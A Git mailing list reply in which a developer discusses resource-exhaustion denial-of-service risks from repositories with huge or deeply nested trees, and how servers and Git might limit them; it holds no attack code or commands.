On Fri, Oct 13, 2017 at 03:12:43PM +0300, Constantine wrote:

> On 13.10.2017 15:04, Junio C Hamano wrote:
> > Christian Couder <christian.cou...@gmail.com> writes:
> > 
> > > Yeah, but perhaps Git could be smarter when rev-listing too and avoid
> > > processing files or directories it has already seen?
> > 
> > Aren't you suggesting to optimize for a wrong case?
> > 
> 
> Anything that is possible with a software should be considered as a possible
> usecase. It's in fact a DoS attack. Imagine there's a server that using git
> to process something, and now there's a way to knock down this server. It's
> also bad from a promotional stand point.

But the point is that you'd have the same problem with any repository
that had 10^7 files in it. Yes, it's convenient for the attacker that
there are only 9 objects, but fundamentally it's pretty easy for an
attacker to construct repositories that have large trees (or very deep
trees -- that's what causes stack exhaustion in some cases).

Note too that this attack almost always comes down to the diff code
(which is why it kicks in for pathspec limiting) which has to actually
expand the tree. Most "normal" server-side operations (like accepting
pushes or serving fetches) operate only on the object graph and _do_
avoid processing already-seen objects.

As soon as servers start trying to checkout or diff, though, the attack
surface gets quite large. And you really need to start thinking about
having resource limits and quotas for CPU and memory use of each process
(and group by requesting user, IP, repo, etc).

I think the main thing Git could be doing here is to limit the size of
the tree (both width and depth). But arbitrary limits like that have a
way of being annoying, and I think it just pushes resource-exhaustion
attacks off a little (e.g., can you construct a blob that behaves badly
with the "--patch"?).

-Peff

Reply via email to